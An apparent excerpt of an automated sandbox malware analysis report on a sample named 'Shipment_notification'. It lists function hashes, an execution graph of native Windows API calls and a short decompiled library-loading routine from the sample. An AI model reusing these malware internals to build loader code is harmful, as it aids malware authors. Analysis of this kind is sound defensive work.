                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 7cb130ec8814b29390117a725af687863c9bf090515f80f38cd1a478c3c01c98
                                                                                • Instruction ID: af47995f7e6d458ae12b08d42c825a465c9c18aeedc8e5ac7aff9275cc087f27
                                                                                • Opcode Fuzzy Hash: 7cb130ec8814b29390117a725af687863c9bf090515f80f38cd1a478c3c01c98
                                                                                • Instruction Fuzzy Hash: B3F062715046449EE7108F15CDC4BA3FFD8EB91734F18C55AED085F286C379A884CAB1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Non-executed Functions

                                                                                Function 00A7F1F8 Relevance: .3, Instructions: 315COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.335529206.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_a70000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 9d05ad6eccb5631196876dd46ab57fc97e9e75c40b6241fbeb33d46085dff626
                                                                                • Instruction ID: b2597bb59fd5d28410d2b9b38c1014c6671f9e4c7e40d7549adbdad38c010e3e
                                                                                • Opcode Fuzzy Hash: 9d05ad6eccb5631196876dd46ab57fc97e9e75c40b6241fbeb33d46085dff626
                                                                                • Instruction Fuzzy Hash: 6C12B5F1611F46DAD330CF65EC9A2893BA1B746328F904309D2615FAF1DBB8128ACF54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00A7C844 Relevance: .3, Instructions: 265COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.335529206.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_a70000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b3fbf924245ed8ad7fdd755586f2a9000417344cbec80aac5e17e868da61e409
                                                                                • Instruction ID: 3fbc879d9125335a44187a1cdf28af76ed34e99b543cc3dd1ef1c8ba9ed461a6
                                                                                • Opcode Fuzzy Hash: b3fbf924245ed8ad7fdd755586f2a9000417344cbec80aac5e17e868da61e409
                                                                                • Instruction Fuzzy Hash: F6A17232E00219CFCF05DFB5C9445DEBBB2FF89300B15C5AAE909AB261EB31A915CB40
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Execution Graph

                                                                                Execution Coverage:4.3%
                                                                                Dynamic/Decrypted Code Coverage:2.5%
                                                                                Signature Coverage:4.7%
                                                                                Total number of Nodes:639
                                                                                Total number of Limit Nodes:79
                                                                                execution_graph 29124 420103 29127 41e7c3 29124->29127 29132 41f213 29127->29132 29129 41e7df 29136 1b29a00 LdrInitializeThunk 29129->29136 29130 41e7fa 29133 41f222 29132->29133 29135 41f298 29132->29135 29133->29135 29137 4195b3 29133->29137 29135->29129 29136->29130 29138 4195cd 29137->29138 29139 4195c1 29137->29139 29138->29135 29139->29138 29142 419a33 LdrLoadDll 29139->29142 29141 41971f 29141->29135 29142->29141 29146 1b29540 LdrInitializeThunk 29147 40b4a3 29148 40b4c8 29147->29148 29153 40cee3 29148->29153 29152 40b520 29154 40cf07 29153->29154 29155 40cf43 LdrLoadDll 29154->29155 29156 40b4fb 29154->29156 29155->29156 29156->29152 29157 40eaa3 29156->29157 29158 40eacf 29157->29158 29168 41e423 29158->29168 29161 40eaef 29161->29152 29165 40eb2a 29177 41e6d3 29165->29177 29167 40eb4d 29167->29152 29169 41f213 LdrLoadDll 29168->29169 29170 40eae8 29169->29170 29170->29161 29171 41e463 29170->29171 29172 41f213 LdrLoadDll 29171->29172 29173 41e47f 29172->29173 29180 1b29710 LdrInitializeThunk 29173->29180 29174 40eb12 29174->29161 29176 41ea53 LdrLoadDll 29174->29176 29176->29165 29178 41f213 LdrLoadDll 29177->29178 29179 41e6ef NtClose 29178->29179 29179->29167 29180->29174 29181 4016fa 29182 40170d 29181->29182 29185 423393 29182->29185 29188 41fc43 29185->29188 29189 41fc69 29188->29189 29202 40be73 29189->29202 29191 41fc75 29192 401788 29191->29192 29210 4100a3 29191->29210 29194 41fc94 29195 41fca7 29194->29195 29222 410063 29194->29222 29198 41fcbc 29195->29198 29231 41e8f3 29195->29231 29227 4034e3 29198->29227 29200 41fccb 29201 41e8f3 2 API calls 29200->29201 29201->29192 29205 40be80 29202->29205 29234 40bdc3 29202->29234 29204 40be87 29204->29191 29205->29204 29246 40bd63 29205->29246 29211 4100cf 29210->29211 29644 40d3b3 29211->29644 29213 4100e1 29648 40ff73 29213->29648 29216 410114 29220 41e6d3 2 API calls 29216->29220 29221 410125 29216->29221 29217 4100fc 29218 410107 29217->29218 29219 41e6d3 2 API calls 29217->29219 29218->29194 29219->29218 29220->29221 29221->29194 29223 410082 29222->29223 29224 4195b3 LdrLoadDll 29222->29224 29225 410089 29223->29225 29226 41008b GetUserGeoID 29223->29226 29224->29223 29225->29195 29226->29195 29228 40353a 29227->29228 29230 403547 29228->29230 29667 40dd43 29228->29667 29230->29200 29232 41e912 ExitProcess 29231->29232 29233 41f213 LdrLoadDll 29231->29233 29233->29232 29235 40bdd6 29234->29235 29286 41ce73 LdrLoadDll 29234->29286 29266 41cd33 29235->29266 29238 40bddf 29239 40bde9 29238->29239 29269 41f593 29238->29269 29239->29205 29241 40be26 29241->29239 29280 40bc03 29241->29280 29243 40be46 29287 40b663 LdrLoadDll 29243->29287 29245 40be58 29245->29205 29247 40bd7a 29246->29247 29626 41f883 29247->29626 29250 41f883 LdrLoadDll 29251 40bd94 29250->29251 29252 41f883 LdrLoadDll 29251->29252 29253 40bdad 29252->29253 29254 40fe63 29253->29254 29255 40fe7c 29254->29255 29630 40d233 29255->29630 29257 40fe8f 29258 41e423 LdrLoadDll 29257->29258 29259 40fe9e 29258->29259 29260 40be98 29259->29260 29634 41ea13 29259->29634 29260->29191 29262 40feb5 29263 40fee0 29262->29263 29637 41e4a3 29262->29637 29265 41e6d3 2 API calls 29263->29265 29265->29260 29288 41e843 29266->29288 29270 41f5ac 29269->29270 29291 4191a3 29270->29291 29272 41f5c4 29273 41f5cd 29272->29273 29330 41f3d3 29272->29330 29273->29241 29275 41f5e1 29275->29273 29347 41e143 29275->29347 29277 41f615 29352 420143 29277->29352 29604 4093f3 29280->29604 29282 40bc24 29282->29243 29283 40bc1d 29283->29282 29617 4096b3 29283->29617 29286->29235 29287->29245 29289 41f213 LdrLoadDll 29288->29289 29290 41cd48 29289->29290 29290->29238 29292 4191b7 29291->29292 29293 4194e6 29291->29293 29292->29293 29355 41de93 29292->29355 29293->29272 29296 4192d5 29296->29272 29297 4192e8 29358 41e5a3 29297->29358 29298 4192cb 29415 41e6a3 LdrLoadDll 29298->29415 29301 41930f 29302 420143 2 API calls 29301->29302 29305 41931b 29302->29305 29303 4194aa 29306 41e6d3 2 API calls 29303->29306 29304 4194c0 29421 418ec3 LdrLoadDll NtReadFile NtClose 29304->29421 29305->29296 29305->29303 29305->29304 29310 4193b3 29305->29310 29307 4194b1 29306->29307 29307->29272 29309 4194d3 29309->29272 29311 41941a 29310->29311 29313 4193c2 29310->29313 29311->29303 29312 41942d 29311->29312 29417 41e523 29312->29417 29315 4193c7 29313->29315 29316 4193db 29313->29316 29416 418d83 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 29315->29416 29319 4193e0 29316->29319 29320 4193f8 29316->29320 29361 418e23 29319->29361 29320->29307 29373 418b43 29320->29373 29322 4193d1 29322->29272 29324 41948d 29327 41e6d3 2 API calls 29324->29327 29325 4193ee 29325->29272 29329 419499 29327->29329 29328 419410 29328->29272 29329->29272 29331 41f3ee 29330->29331 29332 41f400 29331->29332 29439 4200c3 29331->29439 29332->29275 29334 41f420 29442 4187a3 29334->29442 29336 41f443 29336->29332 29337 4187a3 3 API calls 29336->29337 29339 41f465 29337->29339 29339->29332 29474 419b03 29339->29474 29340 41f4ed 29341 41f4fd 29340->29341 29569 41f193 LdrLoadDll 29340->29569 29485 41f003 29341->29485 29344 41f52b 29564 41e103 29344->29564 29346 41f555 29346->29275 29348 41f213 LdrLoadDll 29347->29348 29349 41e15f 29348->29349 29598 1b2967a 29349->29598 29350 41e17a 29350->29277 29601 41e8b3 29352->29601 29354 41f63f 29354->29241 29356 41929c 29355->29356 29357 41f213 LdrLoadDll 29355->29357 29356->29296 29356->29297 29356->29298 29357->29356 29359 41f213 LdrLoadDll 29358->29359 29360 41e5bf NtCreateFile 29359->29360 29360->29301 29362 418e3f 29361->29362 29363 41e523 LdrLoadDll 29362->29363 29364 418e60 29363->29364 29365 418e67 29364->29365 29366 418e7b 29364->29366 29368 41e6d3 2 API calls 29365->29368 29367 41e6d3 2 API calls 29366->29367 29369 418e84 29367->29369 29370 418e70 29368->29370 29422 420263 LdrLoadDll RtlAllocateHeap 29369->29422 29370->29325 29372 418e8f 29372->29325 29374 418b8e 29373->29374 29376 418bc1 29373->29376 29375 41e523 LdrLoadDll 29374->29375 29378 418ba9 29375->29378 29377 418d0c 29376->29377 29380 418bdd 29376->29380 29379 41e523 LdrLoadDll 29377->29379 29381 41e6d3 2 API calls 29378->29381 29385 418d27 29379->29385 29382 41e523 LdrLoadDll 29380->29382 29383 418bb2 29381->29383 29384 418bf8 29382->29384 29383->29328 29387 418c14 29384->29387 29388 418bff 29384->29388 29435 41e563 LdrLoadDll 29385->29435 29391 418c19 29387->29391 29392 418c2f 29387->29392 29390 41e6d3 2 API calls 29388->29390 29389 418d61 29393 41e6d3 2 API calls 29389->29393 29394 418c08 29390->29394 29395 41e6d3 2 API calls 29391->29395 29400 418c34 29392->29400 29423 420223 29392->29423 29396 418d6c 29393->29396 29394->29328 29397 418c22 29395->29397 29396->29328 29397->29328 29409 418c46 29400->29409 29426 41e653 29400->29426 29401 418c9a 29402 418cb1 29401->29402 29434 41e4e3 LdrLoadDll 29401->29434 29404 418cb8 29402->29404 29405 418ccd 29402->29405 29407 41e6d3 2 API calls 29404->29407 29406 41e6d3 2 API calls 29405->29406 29408 418cd6 29406->29408 29407->29409 29410 418d02 29408->29410 29429 41ff43 29408->29429 29409->29328 29410->29328 29412 418ced 29413 420143 2 API calls 29412->29413 29414 418cf6 29413->29414 29414->29328 29415->29296 29416->29322 29418 419475 29417->29418 29419 41f213 LdrLoadDll 29417->29419 29420 41e563 LdrLoadDll 29418->29420 29419->29418 29420->29324 29421->29309 29422->29372 29425 42023b 29423->29425 29436 41e873 29423->29436 29425->29400 29427 41e66f NtReadFile 29426->29427 29428 41f213 LdrLoadDll 29426->29428 29427->29401 29428->29427 29430 41ff50 29429->29430 29431 41ff67 29429->29431 29430->29431 29432 420223 2 API calls 29430->29432 29431->29412 29433 41ff7e 29432->29433 29433->29412 29434->29402 29435->29389 29437 41f213 LdrLoadDll 29436->29437 29438 41e88f RtlAllocateHeap 29437->29438 29438->29425 29570 41e783 29439->29570 29441 4200f0 29441->29334 29443 4187b4 29442->29443 29444 4187bc 29442->29444 29443->29336 29473 418a8f 29444->29473 29574 4212c3 29444->29574 29446 418810 29447 4212c3 2 API calls 29446->29447 29450 41881b 29447->29450 29448 418869 29451 4212c3 2 API calls 29448->29451 29450->29448 29452 4213f3 3 API calls 29450->29452 29585 421363 LdrLoadDll RtlAllocateHeap RtlFreeHeap 29450->29585 29454 41887d 29451->29454 29452->29450 29453 4188da 29455 4212c3 2 API calls 29453->29455 29454->29453 29579 4213f3 29454->29579 29457 4188f0 29455->29457 29458 41892d 29457->29458 29461 4213f3 3 API calls 29457->29461 29459 4212c3 2 API calls 29458->29459 29460 418938 29459->29460 29462 4213f3 3 API calls 29460->29462 29468 418972 29460->29468 29461->29457 29462->29460 29464 418a67 29587 421323 LdrLoadDll RtlFreeHeap 29464->29587 29466 418a71 29588 421323 LdrLoadDll RtlFreeHeap 29466->29588 29586 421323 LdrLoadDll RtlFreeHeap 29468->29586 29469 418a7b 29589 421323 LdrLoadDll RtlFreeHeap 29469->29589 29471 418a85 29590 421323 LdrLoadDll RtlFreeHeap 29471->29590 29473->29336 29475 419b14 29474->29475 29476 4191a3 8 API calls 29475->29476 29478 419b2a 29476->29478 29477 419b33 29477->29340 29478->29477 29479 419b6a 29478->29479 29482 419bb6 29478->29482 29480 420143 2 API calls 29479->29480 29481 419b7b 29480->29481 29481->29340 29483 420143 2 API calls 29482->29483 29484 419bbb 29483->29484 29484->29340 29591 41ee93 29485->29591 29487 41f017 29488 41ee93 LdrLoadDll 29487->29488 29489 41f020 29488->29489 29490 41ee93 LdrLoadDll 29489->29490 29491 41f029 29490->29491 29492 41ee93 LdrLoadDll 29491->29492 29493 41f032 29492->29493 29494 41ee93 LdrLoadDll 29493->29494 29495 41f03b 29494->29495 29496 41ee93 LdrLoadDll 29495->29496 29497 41f044 29496->29497 29498 41ee93 LdrLoadDll 29497->29498 29499 41f050 29498->29499 29500 41ee93 LdrLoadDll 29499->29500 29501 41f059 29500->29501 29502 41ee93 LdrLoadDll 29501->29502 29503 41f062 29502->29503 29504 41ee93 LdrLoadDll 29503->29504 29505 41f06b 29504->29505 29506 41ee93 LdrLoadDll 29505->29506 29507 41f074 29506->29507 29508 41ee93 LdrLoadDll 29507->29508 29509 41f07d 29508->29509 29510 41ee93 LdrLoadDll 29509->29510 29511 41f089 29510->29511 29512 41ee93 LdrLoadDll 29511->29512 29513 41f092 29512->29513 29514 41ee93 LdrLoadDll 29513->29514 29515 41f09b 29514->29515 29516 41ee93 LdrLoadDll 29515->29516 29517 41f0a4 29516->29517 29518 41ee93 LdrLoadDll 29517->29518 29519 41f0ad 29518->29519 29520 41ee93 LdrLoadDll 29519->29520 29521 41f0b6 29520->29521 29522 41ee93 LdrLoadDll 29521->29522 29523 41f0c2 29522->29523 29524 41ee93 LdrLoadDll 29523->29524 29525 41f0cb 29524->29525 29526 41ee93 LdrLoadDll 29525->29526 29527 41f0d4 29526->29527 29528 41ee93 LdrLoadDll 29527->29528 29529 41f0dd 29528->29529 29530 41ee93 LdrLoadDll 29529->29530 29531 41f0e6 29530->29531 29532 41ee93 LdrLoadDll 29531->29532 29533 41f0ef 29532->29533 29534 41ee93 LdrLoadDll 29533->29534 29535 41f0fb 29534->29535 29536 41ee93 LdrLoadDll 29535->29536 29537 41f104 29536->29537 29538 41ee93 LdrLoadDll 29537->29538 29539 41f10d 29538->29539 29540 41ee93 LdrLoadDll 29539->29540 29541 41f116 29540->29541 29542 41ee93 LdrLoadDll 29541->29542 29543 41f11f 29542->29543 29544 41ee93 LdrLoadDll 29543->29544 29545 41f128 29544->29545 29546 41ee93 LdrLoadDll 29545->29546 29547 41f134 29546->29547 29548 41ee93 LdrLoadDll 29547->29548 29549 41f13d 29548->29549 29550 41ee93 LdrLoadDll 29549->29550 29551 41f146 29550->29551 29552 41ee93 LdrLoadDll 29551->29552 29553 41f14f 29552->29553 29554 41ee93 LdrLoadDll 29553->29554 29555 41f158 29554->29555 29556 41ee93 LdrLoadDll 29555->29556 29557 41f161 29556->29557 29558 41ee93 LdrLoadDll 29557->29558 29559 41f16d 29558->29559 29560 41ee93 LdrLoadDll 29559->29560 29561 41f176 29560->29561 29562 41ee93 LdrLoadDll 29561->29562 29563 41f17f 29562->29563 29563->29344 29565 41f213 LdrLoadDll 29564->29565 29566 41e11f 29565->29566 29597 1b29860 LdrInitializeThunk 29566->29597 29567 41e136 29567->29346 29569->29341 29571 41e789 29570->29571 29572 41e79f NtAllocateVirtualMemory 29571->29572 29573 41f213 LdrLoadDll 29571->29573 29572->29441 29573->29572 29575 4212d3 29574->29575 29576 4212d9 29574->29576 29575->29446 29577 420223 2 API calls 29576->29577 29578 4212ff 29577->29578 29578->29446 29580 421363 29579->29580 29581 4213c0 29580->29581 29582 420223 2 API calls 29580->29582 29581->29454 29583 42139d 29582->29583 29584 420143 2 API calls 29583->29584 29584->29581 29585->29450 29586->29464 29587->29466 29588->29469 29589->29471 29590->29473 29592 41eeae 29591->29592 29593 4195b3 LdrLoadDll 29592->29593 29594 41eece 29593->29594 29595 4195b3 LdrLoadDll 29594->29595 29596 41ef82 29594->29596 29595->29596 29596->29487 29596->29596 29597->29567 29599 1b29681 29598->29599 29600 1b2968f LdrInitializeThunk 29598->29600 29599->29350 29600->29350 29602 41f213 LdrLoadDll 29601->29602 29603 41e8cf RtlFreeHeap 29602->29603 29603->29354 29605 409403 29604->29605 29606 4093fe 29604->29606 29607 4200c3 2 API calls 29605->29607 29606->29283 29610 409428 29607->29610 29608 40948b 29608->29283 29609 41e103 2 API calls 29609->29610 29610->29608 29610->29609 29611 409491 29610->29611 29616 4200c3 2 API calls 29610->29616 29620 41e803 29610->29620 29612 4094b7 29611->29612 29614 41e803 2 API calls 29611->29614 29612->29283 29615 4094a8 29614->29615 29615->29283 29616->29610 29618 4096d1 29617->29618 29619 41e803 2 API calls 29617->29619 29618->29243 29619->29618 29621 41f213 LdrLoadDll 29620->29621 29622 41e81f 29621->29622 29625 1b296e0 LdrInitializeThunk 29622->29625 29623 41e836 29623->29610 29625->29623 29627 41f8a6 29626->29627 29628 40cee3 LdrLoadDll 29627->29628 29629 40bd80 29628->29629 29629->29250 29631 40d256 29630->29631 29633 40d2d3 29631->29633 29642 41ded3 LdrLoadDll 29631->29642 29633->29257 29635 41f213 LdrLoadDll 29634->29635 29636 41ea32 LookupPrivilegeValueW 29635->29636 29636->29262 29638 41e4bf 29637->29638 29639 41f213 LdrLoadDll 29637->29639 29643 1b29910 LdrInitializeThunk 29638->29643 29639->29638 29640 41e4de 29640->29263 29642->29633 29643->29640 29645 40d3da 29644->29645 29646 40d233 LdrLoadDll 29645->29646 29647 40d43d 29646->29647 29647->29213 29649 40ff8d 29648->29649 29657 410043 29648->29657 29650 40d233 LdrLoadDll 29649->29650 29651 40ffaf 29650->29651 29658 41e183 29651->29658 29653 40fff1 29661 41e1c3 29653->29661 29656 41e6d3 2 API calls 29656->29657 29657->29216 29657->29217 29659 41e19f 29658->29659 29660 41f213 LdrLoadDll 29658->29660 29659->29653 29660->29659 29662 41f213 LdrLoadDll 29661->29662 29663 41e1df 29662->29663 29666 1b29fe0 LdrInitializeThunk 29663->29666 29664 410037 29664->29656 29666->29664 29668 40dd5a 29667->29668 29669 40d3b3 LdrLoadDll 29668->29669 29670 40ddc5 29669->29670 29703 40d033 29670->29703 29672 40ddeb 29702 40e03c 29672->29702 29712 418ad3 29672->29712 29674 40de30 29674->29702 29715 40a023 29674->29715 29676 40de74 29676->29702 29737 41e743 29676->29737 29680 40deca 29681 40ded1 29680->29681 29750 41e253 29680->29750 29683 420143 2 API calls 29681->29683 29685 40dede 29683->29685 29685->29230 29686 40df1b 29687 420143 2 API calls 29686->29687 29688 40df22 29687->29688 29688->29230 29689 40df2b 29690 410133 3 API calls 29689->29690 29691 40df9f 29690->29691 29691->29681 29692 40dfaa 29691->29692 29693 420143 2 API calls 29692->29693 29694 40dfce 29693->29694 29755 41e2a3 29694->29755 29697 41e253 2 API calls 29698 40e009 29697->29698 29698->29702 29760 41e063 29698->29760 29701 41e8f3 2 API calls 29701->29702 29702->29230 29704 40d040 29703->29704 29705 40d044 29703->29705 29704->29672 29706 40d08f 29705->29706 29708 40d05d 29705->29708 29766 41df13 LdrLoadDll 29706->29766 29765 41df13 LdrLoadDll 29708->29765 29709 40d0a0 29709->29672 29711 40d07f 29711->29672 29713 410133 3 API calls 29712->29713 29714 418af9 29712->29714 29713->29714 29714->29674 29767 40a253 29715->29767 29717 40a249 29717->29676 29718 40a041 29718->29717 29719 4093f3 4 API calls 29718->29719 29720 40a11f 29718->29720 29730 40a07f 29719->29730 29720->29717 29721 40a1ff 29720->29721 29723 4093f3 4 API calls 29720->29723 29721->29717 29814 4103a3 10 API calls 29721->29814 29734 40a15c 29723->29734 29724 40a213 29724->29717 29815 4103a3 10 API calls 29724->29815 29726 40a229 29726->29717 29816 4103a3 10 API calls 29726->29816 29728 40a23f 29728->29676 29730->29720 29731 40a115 29730->29731 29781 409d03 29730->29781 29732 4096b3 2 API calls 29731->29732 29732->29720 29733 409d03 14 API calls 29733->29734 29734->29721 29734->29733 29735 40a1f5 29734->29735 29736 4096b3 2 API calls 29735->29736 29736->29721 29738 41e75a 29737->29738 29739 41f213 LdrLoadDll 29738->29739 29740 41e75f 29739->29740 29898 1b298f0 LdrInitializeThunk 29740->29898 29741 40deab 29743 410133 29741->29743 29744 410150 29743->29744 29899 41e203 29744->29899 29747 410198 29747->29680 29748 41e253 2 API calls 29749 4101c1 29748->29749 29749->29680 29751 41f213 LdrLoadDll 29750->29751 29752 41e26f 29751->29752 29905 1b29780 LdrInitializeThunk 29752->29905 29753 40df0e 29753->29686 29753->29689 29756 41f213 LdrLoadDll 29755->29756 29757 41e2bf 29756->29757 29906 1b297a0 LdrInitializeThunk 29757->29906 29758 40dfe2 29758->29697 29761 41f213 LdrLoadDll 29760->29761 29762 41e07f 29761->29762 29907 1b29a20 LdrInitializeThunk 29762->29907 29763 40e035 29763->29701 29765->29711 29766->29709 29768 40a27a 29767->29768 29769 4093f3 4 API calls 29768->29769 29776 40a4df 29768->29776 29770 40a2cd 29769->29770 29771 4096b3 2 API calls 29770->29771 29770->29776 29772 40a35c 29771->29772 29773 4093f3 4 API calls 29772->29773 29772->29776 29774 40a371 29773->29774 29775 4096b3 2 API calls 29774->29775 29774->29776 29779 40a3d1 29775->29779 29776->29718 29777 4093f3 4 API calls 29777->29779 29778 409d03 14 API calls 29778->29779 29779->29776 29779->29777 29779->29778 29780 4096b3 2 API calls 29779->29780 29780->29779 29782 409d28 29781->29782 29817 41df53 29782->29817 29785 409d7c 29785->29730 29786 409dfd 29850 410283 LdrLoadDll NtClose 29786->29850 29787 41e143 2 API calls 29788 409da0 29787->29788 29788->29786 29790 409dab 29788->29790 29792 409e29 29790->29792 29820 40e053 29790->29820 29791 409e18 29793 409e35 29791->29793 29794 409e1f 29791->29794 29792->29730 29851 41dfd3 LdrLoadDll 29793->29851 29796 41e6d3 2 API calls 29794->29796 29796->29792 29797 409dc5 29797->29792 29840 409b33 29797->29840 29799 409e60 29801 40e053 5 API calls 29799->29801 29803 409e80 29801->29803 29803->29792 29852 41e003 LdrLoadDll 29803->29852 29805 409ea5 29853 41e093 LdrLoadDll 29805->29853 29807 409ebf 29808 41e063 2 API calls 29807->29808 29809 409ece 29808->29809 29810 41e6d3 2 API calls 29809->29810 29811 409ed8 29810->29811 29854 409903 29811->29854 29813 409eec 29813->29730 29814->29724 29815->29726 29816->29728 29818 409d72 29817->29818 29819 41f213 LdrLoadDll 29817->29819 29818->29785 29818->29786 29818->29787 29819->29818 29822 40e081 29820->29822 29821 410133 3 API calls 29823 40e0e3 29821->29823 29822->29821 29824 40e12c 29823->29824 29825 41e253 2 API calls 29823->29825 29824->29797 29826 40e10e 29825->29826 29827 40e118 29826->29827 29830 40e138 29826->29830 29828 41e2a3 2 API calls 29827->29828 29829 40e122 29828->29829 29831 41e6d3 2 API calls 29829->29831 29832 40e1c2 29830->29832 29833 40e1a5 29830->29833 29831->29824 29835 41e2a3 2 API calls 29832->29835 29834 41e6d3 2 API calls 29833->29834 29836 40e1af 29834->29836 29837 40e1d1 29835->29837 29836->29797 29838 41e6d3 2 API calls 29837->29838 29839 40e1db 29838->29839 29839->29797 29841 409b49 29840->29841 29842 409cd4 29841->29842 29870 4096f3 29841->29870 29842->29730 29844 409c48 29844->29842 29845 409903 11 API calls 29844->29845 29846 409c76 29845->29846 29846->29842 29847 41e143 2 API calls 29846->29847 29848 409cab 29847->29848 29848->29842 29849 41e743 2 API calls 29848->29849 29849->29842 29850->29791 29851->29799 29852->29805 29853->29807 29855 40992c 29854->29855 29877 409863 29855->29877 29858 41e743 2 API calls 29859 40993f 29858->29859 29859->29858 29860 4099ca 29859->29860 29862 4099c5 29859->29862 29885 410303 29859->29885 29860->29813 29861 41e6d3 2 API calls 29863 4099fd 29861->29863 29862->29861 29863->29860 29864 41df53 LdrLoadDll 29863->29864 29865 409a62 29864->29865 29865->29860 29889 41df93 29865->29889 29867 409ac6 29867->29860 29868 4191a3 8 API calls 29867->29868 29869 409b1b 29868->29869 29869->29813 29871 4097f2 29870->29871 29872 409708 29870->29872 29871->29844 29872->29871 29873 4191a3 8 API calls 29872->29873 29874 409775 29873->29874 29875 420143 2 API calls 29874->29875 29876 40979c 29874->29876 29875->29876 29876->29844 29878 40987d 29877->29878 29879 40cee3 LdrLoadDll 29878->29879 29880 409898 29879->29880 29881 4195b3 LdrLoadDll 29880->29881 29882 4098b0 29881->29882 29883 4098cc 29882->29883 29884 4098b9 PostThreadMessageW 29882->29884 29883->29859 29884->29883 29886 410316 29885->29886 29892 41e0d3 29886->29892 29890 41dfaf 29889->29890 29891 41f213 LdrLoadDll 29889->29891 29890->29867 29891->29890 29893 41f213 LdrLoadDll 29892->29893 29894 41e0ef 29893->29894 29897 1b29840 LdrInitializeThunk 29894->29897 29895 410341 29895->29859 29897->29895 29898->29741 29900 41e21f 29899->29900 29901 41f213 LdrLoadDll 29899->29901 29904 1b299a0 LdrInitializeThunk 29900->29904 29901->29900 29902 410191 29902->29747 29902->29748 29904->29902 29905->29753 29906->29758 29907->29763

                                                                                Executed Functions

                                                                                Function 0040CEE3 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 485 40cee3-40ceff 486 40cf07-40cf0c 485->486 487 40cf02 call 420ee3 485->487 488 40cf12-40cf20 call 421403 486->488 489 40cf0e-40cf11 486->489 487->486 492 40cf30-40cf41 call 41f783 488->492 493 40cf22-40cf2d call 421683 488->493 498 40cf43-40cf57 LdrLoadDll 492->498 499 40cf5a-40cf5d 492->499 493->492 498->499
                                                                                C-Code - Quality: 93%
                                                                                			E0040CEE3(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E00420EE3( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E00421403(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E00421683( &_v12, 0);
						_t32 = _t32 + 8;
						asm("les ecx, [eax]");
					}
					_t18 = E0041F783(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                                                                0x0040ceff
                                                                                0x0040cf02
                                                                                0x0040cf07
                                                                                0x0040cf0c
                                                                                0x0040cf16
                                                                                0x0040cf1b
                                                                                0x0040cf1e
                                                                                0x0040cf20
                                                                                0x0040cf28
                                                                                0x0040cf2d
                                                                                0x0040cf2e
                                                                                0x0040cf2e
                                                                                0x0040cf34
                                                                                0x0040cf3c
                                                                                0x0040cf3f
                                                                                0x0040cf41
                                                                                0x0040cf55
                                                                                0x00000000
                                                                                0x0040cf57
                                                                                0x0040cf5d
                                                                                0x0040cf11
                                                                                0x0040cf11
                                                                                0x0040cf11

                                                                                APIs
                                                                                • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040CF55
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.377228453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_Shipment_notification.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Load
                                                                                • String ID:
                                                                                • API String ID: 2234796835-0
                                                                                • Opcode ID: 08d05b120cc95a7b7398adf638b707615c4997d63fae75d0ade3ba13be0a099c
                                                                                • Instruction ID: cc44215d3469fb3bd172b71124322f013a9a41121c6daa627780661158093a1d
                                                                                • Opcode Fuzzy Hash: 08d05b120cc95a7b7398adf638b707615c4997d63fae75d0ade3ba13be0a099c
                                                                                • Instruction Fuzzy Hash: 0C0156B1E0010DA7DB10DBE5DC41FDEB3789B54308F0041A6E90897281F534EB588795
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0041E77D Relevance: 1.5, APIs: 1, Instructions: 47memorynativeCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • NtAllocateVirtualMemory.NTDLL(00010000,?,00000000,?,00000004,00001000,00000000), ref: 0041E7BC
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.377228453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_Shipment_notification.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocateMemoryVirtual
                                                                                • String ID:
                                                                                • API String ID: 2167126740-0
                                                                                • Opcode ID: 43fd8091fa23c6cd7930d1a86cfc899ac6fa1b37a1a6fec324ef581b9600c365
                                                                                • Instruction ID: ff924501c7798e13b9855206034707cdc2e1d969fcbcfcb072c3ab56af968a54
                                                                                • Opcode Fuzzy Hash: 43fd8091fa23c6cd7930d1a86cfc899ac6fa1b37a1a6fec324ef581b9600c365
